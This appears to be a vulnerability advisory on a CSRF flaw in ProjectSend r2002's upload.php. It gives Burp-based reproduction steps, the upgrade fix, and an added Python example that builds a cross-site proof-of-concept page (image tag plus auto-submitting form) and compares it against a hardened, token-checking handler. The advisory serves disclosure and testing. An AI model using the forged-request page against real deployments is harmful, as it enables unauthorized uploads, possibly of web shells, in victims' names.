ProjectSend Cross-Site Request Forgery Vulnerability in File Upload Component

Vulnerability

A cross-site request forgery (CSRF) vulnerability has been identified in ProjectSend version r2002. The file upload handler in upload.php does not validate a CSRF token, and it accepts the upload parameters over GET as well as POST. An attacker can therefore take a legitimate upload request, move its parameters into the query string, and deliver the resulting URL as a link or embedded image; when an authenticated user's browser fetches it, the upload is performed with that user's session and without their consent. Because the endpoint validates neither a token nor the request method, the original POST issued cross-site from an auto-submitting form is not rejected either; converting it to GET simply makes the attack deliverable as a plain link.

Impact

Exploitation of this vulnerability allows unauthorized file uploads on behalf of an authenticated user. Depending on what is uploaded and on how the application stores and serves uploaded files, this could lead to execution of malicious content such as a web shell, or to storage abuse and denial-of-service conditions.

Reproduction

To reproduce this vulnerability, log into ProjectSend as a user with upload privileges. Capture a legitimate POST upload request (use a harmless test file) with a web proxy such as Burp Suite. In Burp Repeater, convert the request to GET, keeping every upload parameter in the query string, and send it. The file appearing in the upload listing shows that the endpoint accepts the upload over GET with no token check. To confirm the cross-site aspect rather than just method tolerance, place the same GET URL in a page on a different origin (for example as an image source) and load that page in the browser holding the authenticated session; the upload completing without any interaction confirms the CSRF.

Remediation

Users are advised to upgrade to ProjectSend version r2029, which addresses this vulnerability by restoring proper CSRF validation on the file upload endpoint. The updated version is available for download from the ProjectSend GitHub repository. After upgrading, repeat the reproduction steps above against the new version and confirm that the replayed GET request and the cross-site page are both rejected.
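The following is an added example written for this page; it is not ProjectSend code. It covers both the reproduction steps above and the kind of check the fix in the Remediation section must pass: it turns a captured upload request into the GET URL and the cross-site page an attacker would use, then replays those forged requests against a model of the r2002 handler (any method accepted, no token) and against a hardened handler that requires POST and a per-session CSRF token. The host name, parameter names and captured request are assumptions chosen for illustration.

```python
"""Added example, not ProjectSend code.  Models the r2002 upload.php behaviour
described in this advisory (parameters accepted regardless of HTTP method, no
CSRF token) next to a hardened handler, and builds the cross-site page an
attacker would use.  Host, cookie-less session model and parameter names are
assumptions chosen for illustration."""
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed stand-in for an upload request captured in Burp Suite (assumed values).
CAPTURED_POST = {
    "url": "https://projectsend.example/upload.php",             # assumed host
    "params": {"name": "test.txt", "chunk": "0", "chunks": "1"},  # assumed names
}


def to_get_url(captured):
    """The Burp Repeater step: keep every parameter, move it to the query string."""
    return captured["url"] + "?" + urlencode(captured["params"])


def params_from_url(url):
    """What the server parses when the GET URL is fetched."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def csrf_poc_html(captured):
    """Attacker page: an <img> fires the GET variant and an auto-submitting
    form fires the original POST.  Either succeeds when no token is checked."""
    inputs = "".join(
        f'<input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in captured["params"].items()
    )
    return (
        f'<img src="{escape(to_get_url(captured))}" alt="">\n'
        f'<form id="f" method="POST" action="{escape(captured["url"])}">{inputs}</form>\n'
        '<script>document.getElementById("f").submit()</script>'
    )


def vulnerable_upload(method, params, session):
    """Model of the r2002 handler: any method, no token; the upload is
    recorded against whatever session the browser attached."""
    if "name" not in params:
        return 400
    session.setdefault("uploads", []).append(params["name"])
    return 200


def issue_csrf_token(session):
    """Per-session token that only the real, same-origin upload form carries."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def hardened_upload(method, params, session):
    """Hardened handler: state change only over POST, and only with a token
    matching the one stored in the session (constant-time comparison)."""
    if method != "POST":
        return 405
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    if "name" not in params:
        return 400
    session.setdefault("uploads", []).append(params["name"])
    return 200


def run_checks():
    """Replay the forged request against both handlers; returns status codes."""
    forged = params_from_url(to_get_url(CAPTURED_POST))
    victim = {}  # the victim's server-side session, attached via their cookie
    results = {
        "vulnerable_get": vulnerable_upload("GET", forged, victim),
        "hardened_get": hardened_upload("GET", forged, victim),
        "hardened_post_no_token": hardened_upload("POST", forged, victim),
    }
    token = issue_csrf_token(victim)  # an attacker page cannot read this value
    results["hardened_post_with_token"] = hardened_upload(
        "POST", {**forged, "csrf_token": token}, victim)
    results["uploads_recorded"] = len(victim.get("uploads", []))
    return results


if __name__ == "__main__":
    print(csrf_poc_html(CAPTURED_POST))
    for check, status in run_checks().items():
        print(f"{check}: {status}")
```

Only the vulnerable model accepts the GET replay and the token-less POST; the hardened handler accepts the upload solely when the token issued to that session is present, which a cross-site page cannot obtain.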

Added: Apr 6, 2026, 6:20 AM
Updated: Apr 6, 2026, 6:20 AM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 0.6
exploitability: 7.7
remediation: 7.7
relevance: 5.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.